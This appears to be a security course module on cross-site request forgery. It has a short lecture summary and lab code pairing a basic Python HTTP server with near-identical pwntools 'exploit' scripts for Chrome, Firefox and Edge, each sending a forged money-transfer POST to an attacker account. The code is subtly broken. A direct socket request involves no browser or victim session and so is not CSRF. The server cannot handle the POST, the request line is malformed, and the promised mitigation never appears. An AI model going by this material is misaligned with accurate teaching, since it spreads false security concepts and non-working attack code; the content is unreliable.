3. Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF)

Lecture: Exploring CSRF attacks and browser-specific considerations.

<lecture>: In this lecture, we will delve into the world of Cross-Site Request Forgery (CSRF) attacks, exploring their underlying mechanisms and potential impact on web application security. CSRF attacks occur when an attacker tricks a user into performing unintended actions on a web application where the user is authenticated.

We will discuss various techniques used by attackers to exploit CSRF vulnerabilities, including the use of maliciously crafted HTML pages, social engineering tactics, and the exploitation of browser weaknesses. Additionally, we will explore browser-specific considerations that may affect the effectiveness of CSRF attacks, such as browser security mechanisms and default behavior.

By the end of this lecture, students will have a deep understanding of CSRF attacks and the factors that influence their success across different web browsers.

Lab: Creating and mitigating CSRF attacks in Chrome, Firefox, and Edge.

Chrome Exploitation:

<defender side code>: To set up the defender side, we need a simple web server. Here's an example using Python's built-in HTTP server:

import http.server
import socketserver

PORT = 8000

Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()
        

<exploit code>: Exploiting CSRF in Chrome can be done using Python with libraries like pwntools. Below is an example exploit code for launching a CSRF attack:

from pwn import *

url = 'http://localhost:8000/transfer'
payload = 'victim_account=attacker_account&amount=1000'

r = remote('localhost', 8000)
r.send(f'POST {url} HTTP/1.1\\nHost: localhost\\nContent-Type: application/x-www-form-urlencoded\\nContent-Length: {len(payload)}\\n\\n{payload}')
print(r.recvall().decode())
        

Firefox Exploitation:

<defender side code>: Similar to Chrome setup, we can use Python's built-in HTTP server.

import http.server
import socketserver

PORT = 8001

Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()
        

<exploit code>: Exploiting CSRF in Firefox can be done similarly to Chrome, here's an example:

from pwn import *

url = 'http://localhost:8001/transfer'
payload = 'victim_account=attacker_account&amount=1000'

r = remote('localhost', 8001)
r.send(f'POST {url} HTTP/1.1\\nHost: localhost\\nContent-Type: application/x-www-form-urlencoded\\nContent-Length: {len(payload)}\\n\\n{payload}')
print(r.recvall().decode())
        

Edge Exploitation:

<defender side code>: Again, using Python's HTTP server.

import http.server
import socketserver

PORT = 8002

Handler = http.server.SimpleHTTPRequestHandler

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving at port", PORT)
    httpd.serve_forever()
        

<exploit code>: Exploiting CSRF in Edge follows the same principle, here's an example exploit:

from pwn import *

url = 'http://localhost:8002/transfer'
payload = 'victim_account=attacker_account&amount=1000'

r = remote('localhost', 8002)
r.send(f'POST {url} HTTP/1.1\\nHost: localhost\\nContent-Type: application/x-www-form-urlencoded\\nContent-Length: {len(payload)}\\n\\n{payload}')
print(r.recvall().decode())